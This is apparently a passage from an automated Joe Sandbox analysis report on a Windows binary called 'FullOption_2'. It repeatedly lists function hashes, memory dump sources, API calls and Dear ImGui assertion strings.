                                                                                  • Opcode Fuzzy Hash: 1364f7707bc0fdad3a237ddd67229ba77d4a52a150f4b5eb3c3662c657efd2e3
                                                                                  • Instruction Fuzzy Hash: 0221B036A15B8696EB14EF2BD4842AC3771FB98B88F446135EF0D43269CF38E590C700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: (0) && "Called PushStyleVar() variant with wrong type!"$D:\ALLLLREALSHY\src\$idx >= 0 && idx < ImGuiStyleVar_COUNT
                                                                                  • API String ID: 3234217646-2347254468
                                                                                  • Opcode ID: e28f41f02f547f4d2817ec96d4e3642eeabb17457f5a76b54e4cded5a7c3e08d
                                                                                  • Instruction ID: 93a1bd0354dc99410e7ed5c0daa90496b14e3eab89d5bd87a1388e5ef5be145e
                                                                                  • Opcode Fuzzy Hash: e28f41f02f547f4d2817ec96d4e3642eeabb17457f5a76b54e4cded5a7c3e08d
                                                                                  • Instruction Fuzzy Hash: FA21DE72A19E92C6D720EF1AF8400A9B360FBA5784F445631FB4E03668EF3CE251CB00
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: (0) && "Called PushStyleVar() variant with wrong type!"$D:\ALLLLREALSHY\src\$idx >= 0 && idx < ImGuiStyleVar_COUNT
                                                                                  • API String ID: 3234217646-2347254468
                                                                                  • Opcode ID: a5a0595697a1ec385ab7bae324c1c1ad4ffda547d5980eaacc6ea689391f0486
                                                                                  • Instruction ID: fc26840c0592984f9db4e244f7ee6be34564574871bd98f346fff52fb3ea517c
                                                                                  • Opcode Fuzzy Hash: a5a0595697a1ec385ab7bae324c1c1ad4ffda547d5980eaacc6ea689391f0486
                                                                                  • Instruction Fuzzy Hash: BD11D571A19F82C2E7209F1AE8400B9B7A0FBA4794F406271FA4E43668DF7CE655CB00
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$g.ActiveId != 0$g.NavWindow != 0
                                                                                  • API String ID: 3234217646-3478775450
                                                                                  • Opcode ID: e891d380a63c464a629ccee0055d568f324fd6f2421d793f787c7e3bd8fe790f
                                                                                  • Instruction ID: 13fcd0037b7ef6acd66fb81b0daec71e4bee52c3e8c00f113f7a94edc7dd53a5
                                                                                  • Opcode Fuzzy Hash: e891d380a63c464a629ccee0055d568f324fd6f2421d793f787c7e3bd8fe790f
                                                                                  • Instruction Fuzzy Hash: BC019291A1A686D0F711AF16E8843B42BA0FB65B08F4864B4E60D47390DFBC5195C318
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: imgui.ini$imgui_log.txt
                                                                                  • API String ID: 2221118986-3179804127
                                                                                  • Opcode ID: 07fe7b48ca77a503f59052effd18f566b487f3ba2af7f1fa66bd4b0ead2f6811
                                                                                  • Instruction ID: 5aedcc8ec441d5f675265be433b201f9952052661c157c19685886d740c16787
                                                                                  • Opcode Fuzzy Hash: 07fe7b48ca77a503f59052effd18f566b487f3ba2af7f1fa66bd4b0ead2f6811
                                                                                  • Instruction Fuzzy Hash: 96510AF21057819AC711EF39D964389BBACF721B48F688239DB580F768CB328549CB94
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: freemallocmemcpy
                                                                                  • String ID: #MOVE
                                                                                  • API String ID: 3056473165-3098322713
                                                                                  • Opcode ID: 48fc0905424bbe066f4fc1a86638c7e2c5d38da7ddf47b5f77e777a452f01c9b
                                                                                  • Instruction ID: df9232ccc5d4e63521581bbe7ea3fa3d752267c8b0ada72dfa71b0b50fabe84b
                                                                                  • Opcode Fuzzy Hash: 48fc0905424bbe066f4fc1a86638c7e2c5d38da7ddf47b5f77e777a452f01c9b
                                                                                  • Instruction Fuzzy Hash: E6015B32A16A8281EE14EF16E190178B360FF64F84B08A472EB1E87759DF3CE852C710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$new_size <= Size
                                                                                  • API String ID: 3234217646-2891089598
                                                                                  • Opcode ID: aa7c6399f60a4269e279c9e2de5412682a19f6a76d24ca53c306cd7e8d8e596d
                                                                                  • Instruction ID: fe464c2fa990cea80e5fb9011e2f315c442b9a08304f33fa016e3ecfc124e629
                                                                                  • Opcode Fuzzy Hash: aa7c6399f60a4269e279c9e2de5412682a19f6a76d24ca53c306cd7e8d8e596d
                                                                                  • Instruction Fuzzy Hash: 56E15E73915BC88BD355DF27D581668B360FF6DB40F08E726EB44636A0EB34A4A4EB00
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6F56CE), ref: 00007FF6AE6F50B1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: (flags & 0x0F) == 0 && "Misuse of legacy hardcoded ImDrawCornerFlags values!"$D:\ALLLLREALSHY\src\
                                                                                  • API String ID: 3234217646-3595037129
                                                                                  • Opcode ID: 9462c07957d0bfc72d78f014bbeea6291e70a9a748f5d5420376a52a457dd1f8
                                                                                  • Instruction ID: 4a46549153e61f4d2ef07530fc5f6002fd2b34f731e61099ce04b5c9ceed9ada
                                                                                  • Opcode Fuzzy Hash: 9462c07957d0bfc72d78f014bbeea6291e70a9a748f5d5420376a52a457dd1f8
                                                                                  • Instruction Fuzzy Hash: 22B12032A1568586E721DB3BD4417A97350FFA9344F54E731F988A3AA4DF3CF8419B40
                                                                                  APIs
                                                                                  Strings
                                                                                  • GImGui != 0 && "No current context. Did you call ImGui::CreateContext() and ImGui::SetCurrentContext() ?", xrefs: 00007FF6AE6F2208
                                                                                  • D:\ALLLLREALSHY\src\, xrefs: 00007FF6AE6F2201
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$GImGui != 0 && "No current context. Did you call ImGui::CreateContext() and ImGui::SetCurrentContext() ?"
                                                                                  • API String ID: 3234217646-3314611915
                                                                                  • Opcode ID: 63c01a0494156826806b9627db7ec9cf09a62e837f3b0d02f0ddfad6d53d421f
                                                                                  • Instruction ID: 8b3def8f2be002d621ca3dff2ebfe6690272ef453794ca7c95d7408cdc4950e6
                                                                                  • Opcode Fuzzy Hash: 63c01a0494156826806b9627db7ec9cf09a62e837f3b0d02f0ddfad6d53d421f
                                                                                  • Instruction Fuzzy Hash: 99E14712D1ABCA85E243873F95452B47720EFBE648F39E736FE9874472AF2521C69204
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$Size > 0
                                                                                  • API String ID: 3234217646-525454446
                                                                                  • Opcode ID: 93d93b1bac5656e84b5a616d14b9cd772fd2cc7a441e42eec4e3563e74e3aadd
                                                                                  • Instruction ID: 4f8c55bd4f775afb120f7a3fb81074d964ac89ca812f5920bd24b716311eca15
                                                                                  • Opcode Fuzzy Hash: 93d93b1bac5656e84b5a616d14b9cd772fd2cc7a441e42eec4e3563e74e3aadd
                                                                                  • Instruction Fuzzy Hash: 4EA18522E15BC989E711DB3B94813FC73A0FFA9348F18A721FE4862665DF38A195D700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-608382026
                                                                                  • Opcode ID: 94aa48fabd621fce622743057fb41d94d9d28f95eb05de1d5f7f2843b02c1b79
                                                                                  • Instruction ID: 9e59e45d41fc7dc4188b483a69317a7c771920883a87569212be82daa4500d89
                                                                                  • Opcode Fuzzy Hash: 94aa48fabd621fce622743057fb41d94d9d28f95eb05de1d5f7f2843b02c1b79
                                                                                  • Instruction Fuzzy Hash: 8E810C76E0AAC286EB65AF37908017967E4EF21784F6C7935EB0D97281EF6CF5409700
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AE6D9893), ref: 00007FF6AE6DCA0C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-608382026
                                                                                  • Opcode ID: a57e0587547d53af68aa3c2f3537e6319c6922483969d0c55925b4d1859d547d
                                                                                  • Instruction ID: 8115c578a8a4a931c6592e3fdb1bf26776c4fe40ee08037eb52825f4009916a6
                                                                                  • Opcode Fuzzy Hash: a57e0587547d53af68aa3c2f3537e6319c6922483969d0c55925b4d1859d547d
                                                                                  • Instruction Fuzzy Hash: A461FA22909F8D85D6169F3B90802B9B7A0FF69B40F6CAB31FE4C66590DF39F5919600
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6E95F3), ref: 00007FF6AE6EAFD3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-608382026
                                                                                  • Opcode ID: 40bb704ae41ad4c4ac71b2baa18498addd6dcfcccdcdf19c91e6d3cff35dc1c3
                                                                                  • Instruction ID: 53721dad12e9faf66c346bf883cb22a15e91f561a4bf3e797edbaa2460c66e3b
                                                                                  • Opcode Fuzzy Hash: 40bb704ae41ad4c4ac71b2baa18498addd6dcfcccdcdf19c91e6d3cff35dc1c3
                                                                                  • Instruction Fuzzy Hash: 2161EC32915AC886D2229B3794011E5B360EF7A784F1CEB22FB49736B1DF39B5859700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-608382026
                                                                                  • Opcode ID: cb6da92eb6a3cc95efefd812f98887c93977fb808a64cbf46c3aba2e0e9e54d9
                                                                                  • Instruction ID: 96782e77f1fac5403d2100d88bd4981a23eff97cba570e45657d7998b0d53541
                                                                                  • Opcode Fuzzy Hash: cb6da92eb6a3cc95efefd812f98887c93977fb808a64cbf46c3aba2e0e9e54d9
                                                                                  • Instruction Fuzzy Hash: EA61C526915ACD85E2129B3B80422F873A0FF7A788F5CFB21FE48671A1DF25B195D700
                                                                                  APIs
                                                                                  Strings
                                                                                  • D:\ALLLLREALSHY\src\, xrefs: 00007FF6AE6D8F15
                                                                                  • (flags & (ImGuiHoveredFlags_AnyWindow | ImGuiHoveredFlags_RootWindow | ImGuiHoveredFlags_ChildWindows | ImGuiHoveredFlags_NoPopupH, xrefs: 00007FF6AE6D8F1C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: (flags & (ImGuiHoveredFlags_AnyWindow | ImGuiHoveredFlags_RootWindow | ImGuiHoveredFlags_ChildWindows | ImGuiHoveredFlags_NoPopupH$D:\ALLLLREALSHY\src\
                                                                                  • API String ID: 3234217646-1705745749
                                                                                  • Opcode ID: bac69f126df6b702449a1acef15965dfd7006502008e4f7b9f697fd40d7ef7ce
                                                                                  • Instruction ID: 81d1c6c296470de46fe24ee730588993b6ee82c4648b363888c644df1121709b
                                                                                  • Opcode Fuzzy Hash: bac69f126df6b702449a1acef15965dfd7006502008e4f7b9f697fd40d7ef7ce
                                                                                  • Instruction Fuzzy Hash: 3E51E52AE0EA8685FB61AA17D0883B922D1EF74B44FAC7C34EA0C86594DF7CA4419704
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6FBF54), ref: 00007FF6AE6F2F39
                                                                                    • Part of subcall function 00007FF6AE6F29F0: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6F2F1C), ref: 00007FF6AE6F2A67
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
